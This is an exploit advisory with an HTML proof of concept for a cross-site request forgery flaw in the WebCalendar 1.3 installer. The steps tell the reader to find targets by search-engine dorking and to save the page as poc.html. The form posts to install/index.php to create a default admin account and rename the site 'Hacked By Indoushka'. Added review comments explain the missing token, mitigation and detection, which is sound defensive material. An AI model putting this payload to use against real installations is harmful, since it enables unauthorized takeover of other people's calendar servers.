Headline
WebCalendar 1.3 Cross Site Request Forgery
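WebCalendar version 1.3 suffers from a cross-site request forgery vulnerability. The proof of concept below targets the installer's application-settings step (install/index.php). Its form carries no anti-CSRF token field, so the claim is that the installer accepts this state-changing POST when an operator's browser is induced to send it.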
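====================================================================================================================================
| # Title     : WebCalendar v1.3 CSRF Vulnerability
| # Author    : indoushka
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)
| # Vendor    : https://github.com/craigk5n/webcalendar/archive/master.zip
| # Dork      : WebCalendar v1.3
====================================================================================================================================

poc :

[+] Dorking in Google or other search engine.
[+] The following HTML code creates a new admin.
[+] Go to the line 173.
[+] Set the target site link, save changes and apply.
[+] Affected file : install/index.php.
[+] http://127.0.0.1/q7.3/admin/settings.php.
[+] save code as poc.html .
[+]

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<!--
  Review notes on this listing:
  * The markup appears to be a saved copy of the WebCalendar installer's
    "Application Settings" page (wizard step 4). Its form posts
    multipart/form-data to install/index.php?action=switch&page=4.
  * The only hidden field is app_settings=1. No anti-CSRF token field appears
    anywhere in the form, so nothing in the request ties it to a page the
    installer itself served. That the server accepts it is the advisory's claim.
  * Nothing here submits on its own: the "Save Settings" button is type="button"
    and calls validate(), which ends in form.submit().
  * Mitigation: state-changing installer requests should require an
    unpredictable per-session token verified on POST, and install/ should be
    removed or access-restricted once setup is complete.
  * Detection: on an already-installed site, a POST to install/index.php with
    action=switch (especially carrying app_settings or load_admin) is worth
    alerting on.
  * The concrete host in the original listing has been replaced by the
    placeholder TARGET.example. It stands for the base URL of the WebCalendar
    instance under test.
-->
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
  <head>
    <title>WebCalendar Setup Wizard</title>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
    <script>
<!-- <![CDATA[
      // NOTE(review): the line breaks in this script are significant. The "//"
      // and "<!--" markers are single-line comments, so the script only parses
      // as intended when each statement sits on its own line.
      var xlate = [];

      xlate['invalidColor'] = 'Invalid Color';

      // NOTE(review): testPHPInfo, db_type_handler and chkPassword are not
      // referenced anywhere in this listing; they look like leftovers from
      // other installer steps.
      function testPHPInfo() {
        var url = "index.php?action=phpinfo";
        window.open( url, 'wcTestPHPInfo', 'width=800,height=600,resizable=yes,scrollbars=yes' );
      }

      // Client-side checks for the settings form, then submit. These checks run
      // only in the browser and are not a server-side control.
      function validate( form ) {
        // Only check to make sure single-user login is specified
        // if in single-user mode.
        var err = '',
          form = document.form_app_settings,
          listid = 0;

        // Find id of single user object.
        for( i = 0; i < form.form_user_inc.length; i++ ) {
          if( form.form_user_inc.options[i].value == 'none' )
            listid = i;
        }
        if( form.form_user_inc.options[listid].selected ) {
          if( form.form_single_user_login.value.length == 0 ) {
            // No single user login specified.
            alert( 'Error: You must specify a\nSingle-User Login.' );
            form.form_single_user_login.focus();
            return false;
          }
        }
        if( form.form_server_url.value == '' ) {
          err += "Server URL is required.\n";
          form.form_server_url.select();
          form.form_server_url.focus();
        } else if( form.form_server_url.value.charAt( form.form_server_url.value.length - 1 ) != '/' ) {
          err += "Server URL must end with a slash(/).\n";
          form.form_server_url.select();
          form.form_server_url.focus();
        }
        if( err != '' ) {
          alert( "Error:\n\n" + err );
          return false;
        }
        // Submit form...
        form.submit();
      }

      // Shows or hides the single-user row. makeVisible/makeInvisible are
      // defined outside this listing, presumably in ../includes/js/visible.js.
      function auth_handler() {
        var form = document.form_app_settings,
          listid = 0;

        // Find id of single user object.
        for( i = 0; i < form.form_user_inc.length; i++ ) {
          if( form.form_user_inc.options[i].value == 'none' )
            listid = i;
        }
        if( form.form_user_inc.options[listid].selected ) {
          makeVisible( 'singleuser' );
        } else {
          makeInvisible( 'singleuser' );
        }
      }

      function db_type_handler() {
        var form = document.dbform,
          listid = 0,
          selectvalue = form.form_db_type.value;

        // NOTE(review): $db_type looks like an unexpanded PHP variable; as
        // JavaScript it is an undeclared identifier. Left as published.
        if( selectvalue == 'sqlite' || $db_type == 'sqlite3' || selectvalue == 'ibase' ) {
          form.form_db_database.size = 65;
          document.getElementById( 'db_name' ).innerHTML = 'Database Name: Full Path (no backslashes)';
        } else {
          form.form_db_database.size = 20;
          document.getElementById( 'db_name' ).innerHTML = 'Database Name: ';
        }
      }

      function chkPassword() {
        var form = document.dbform,
          db_pass = form.form_db_password.value,
          illegalChars = /\#/;

        // Do not allow #.../\#/ would stop all non-alphanumeric.
        if( illegalChars.test( db_pass ) ) {
          alert( 'The password contains illegal characters.' );
          form.form_db_password.select();
          form.form_db_password.focus();
          return false;
        }
      }
//]]> -->
    </script>
    <script src="../includes/js/visible.js"></script>
    <style>
      body {
        margin:0;
        background:#fff;
        font-family:Arial, Helvetica, sans-serif;
      }
      table {
        border:0;
      }
      th.header,
      th.pageheader,
      th.redheader {
        background:#eee;
      }
      th.pageheader {
        padding:10px;
        font-size:18px;
      }
      th.header,
      th.redheader {
        font-size:14px;
      }
      th.redheader,
      .notrecommended {
        color:red;
      }
      td {
        padding:5px;
      }
      td.prompt,
      td.subprompt {
        padding-right:20px;
        font-weight:bold;
      }
      td.subprompt {
        font-size:12px;
      }
      div.nav {
        margin:0;
        border-bottom:1px solid #000;
      }
      div.main {
        margin:10px;
      }
      li {
        margin-top:10px;
      }
      doc.li {
        margin-top:5px;
      }
      .recommended {
        color:green;
      }
    </style>
  </head>
  <body onload="auth_handler();">
    <table border="1" width="90%" class="aligncenter">
      <th class="pageheader" colspan="2">WebCalendar Installation Wizard Step 4</th>
      <tr>
        <td colspan="2" width="50%">This is the final step in setting up your WebCalendar Installation.</td>
      </tr>
      <th class="header" colspan="2">Application Settings</th>
      <tr>
        <td colspan="2">
          <ul><li>HTTP-based authentication was not detected. You will need to reconfigure your web server if you wish to select 'Web Server' from the 'User Authentication' choices below.</li></ul>
        </td>
      </tr>
      <tr>
        <td>
          <table width="75%" class="aligncenter">
            <tr>
              <!--
                The advisory's "Set the target site link" step presumably refers
                to this action URL and to the Server URL field below. Line
                numbers here differ from the author's original file.
                The form's fields are ordinary settings values; none of them is
                a per-session secret.
              -->
              <form action="http://TARGET.example/webcalendar/install/index.php?action=switch&page=4" method="post" enctype='multipart/form-data' name="form_app_settings">
              <input type="hidden" name="app_settings" value="1" />
              <td class="prompt">Create Default Admin Account:</td>
              <td>
                <!-- load_admin is the field the installer labels as default-admin creation. -->
                <input type="checkbox" name="load_admin" value="Yes" />
                <span class="notrecommended"> (Admin Account Not Found)</span>
              </td>
            </tr>
            <tr>
              <td class="prompt">Application Name:</td>
              <td><input type="text" size="40" name="form_application_name" id="form_application_name" value="Hacked By Indoushka" /></td>
            </tr>
            <tr>
              <td class="prompt">Server URL:</td>
              <td><input type="text" size="40" name="form_server_url" id="form_server_url" value="http://TARGET.example/webcalendar/" /></td>
            </tr>
            <tr>
              <td class="prompt">User Authentication:</td>
              <td>
                <select name="form_user_inc" onChange="auth_handler()">
                  <option value="user.php" selected="selected">Web-based via WebCalendar (default)</option>
                  <option value="http">Web Server (not detected)</option>
                  <option value="user-imap.php">IMAP</option>
                  <option value="none" >None (Single-User)</option>
                </select>
              </td>
            </tr>
            <tr id="singleuser">
              <td class="prompt">&nbsp;&nbsp;&nbsp;Single-User Login:</td>
              <td><input name="form_single_user_login" size="20" value="" /></td>
            </tr>
            <tr>
              <td class="prompt">Read-Only:</td>
              <td>
                <input name="form_readonly" value="true" type="radio" />Yes&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
                <input name="form_readonly" value="false" type="radio" checked="checked" />No
              </td>
            </tr>
            <tr>
              <td class="prompt">Environment:</td>
              <td>
                <select name="form_mode">
                  <option value="prod" selected="selected">Production</option>
                  <option value="dev">Development</option>
                </select>
              </td>
            </tr>
          </table>
        </td>
      </tr>
    </table>
    <table width="80%" class="aligncenter">
      <tr>
        <td class="aligncenter">
          <input name="action" type="button" value="Save Settings" onClick="return validate();" />
          <input type="button" value="Logout" onclick="document.location.href='index.php?action=logout'" />
          </form>
        </td>
      </tr>
    </table>
  </body>
</html>

Greetings to :
=================================================================
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |
===============================================================================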